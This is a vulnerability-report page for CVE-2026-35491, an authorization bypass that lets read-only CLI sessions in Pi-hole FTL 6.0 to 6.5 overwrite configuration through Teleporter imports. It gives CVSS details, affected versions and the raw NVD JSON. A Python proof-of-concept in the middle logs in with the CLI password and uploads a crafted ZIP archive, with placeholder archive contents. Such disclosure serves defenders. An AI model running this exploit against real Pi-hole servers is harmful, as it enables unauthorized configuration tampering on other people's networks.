Security Vulnerability Report
CVE-2026-35491 CVSS 6.1 MEDIUM

Published: 2026-04-07 16:16:27
Last Modified: 2026-04-17 19:47:03

Description

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, Pi-hole FTL supports a CLI password feature (webserver.api.cli_pw) that creates “CLI” API sessions intended to be read-only for configuration changes. While /api/config correctly blocks CLI sessions from mutating configuration, /api/teleporter allowed Teleporter imports for CLI sessions, enabling a CLI-scoped session to overwrite configuration via a Teleporter archive (authorization bypass). This vulnerability is fixed in 6.6.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:* - VULNERABLE
Pi-hole FTL >= 6.0, < 6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import zipfile
import io

target_url = "http://pi-hole-local:80"
cli_password = "your_cli_password_here"

# 1. Authenticate to get a CLI session (Read-only)
session = requests.Session()
auth_resp = session.post(f"{target_url}/api/auth", json={"password": cli_password})
if auth_resp.status_code != 200:
    print("[!] Failed to authenticate with CLI password")
    exit(1)
print("[+] CLI Session established successfully")

# 2. Create a malicious Teleporter archive (ZIP)
# This archive contains configuration files intended to overwrite existing settings
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
    # Example: Adding a config file that changes settings
    # Note: Actual internal filenames depend on Pi-hole's Teleporter structure
    zf.writestr("etc/pihole/setupVars.conf", "MALICIOUS_CONFIG=true")
zip_buffer.seek(0)
print("[+] Malicious Teleporter archive created")

# 3. Exploit: Upload the archive via /api/teleporter
# The vulnerability allows the CLI session to import, which writes to disk
files = {'file': ('exploit_teleporter.zip', zip_buffer, 'application/zip')}
upload_resp = session.post(f"{target_url}/api/teleporter", files=files)
if upload_resp.status_code == 200:
    print("[+] Exploit successful! Configuration overwritten via Teleporter import.")
else:
    print(f"[-] Exploit failed. Status code: {upload_resp.status_code}")

References

https://github.com/pi-hole/FTL/security/advisories/GHSA-r7g8-3fj7-m5qq (Vendor Advisory; tagged Exploit, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35491",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T16:16:27.467",
    "lastModified": "2026-04-17T19:47:02.883",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, Pi-hole FTL supports a CLI password feature (webserver.api.cli_pw) that creates “CLI” API sessions intended to be read-only for configuration changes. While /api/config correctly blocks CLI sessions from mutating configuration, /api/teleporter allowed Teleporter imports for CLI sessions, enabling a CLI-scoped session to overwrite configuration via a Teleporter archive (authorization bypass). This vulnerability is fixed in 6.6."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.0",
                "versionEndExcluding": "6.6",
                "matchCriteriaId": "B6C2E10B-7CA2-4E8D-A474-B7980BF3FC2C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-r7g8-3fj7-m5qq",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Mitigation",
          "Vendor Advisory"
        ]
      }
    ]
  }
}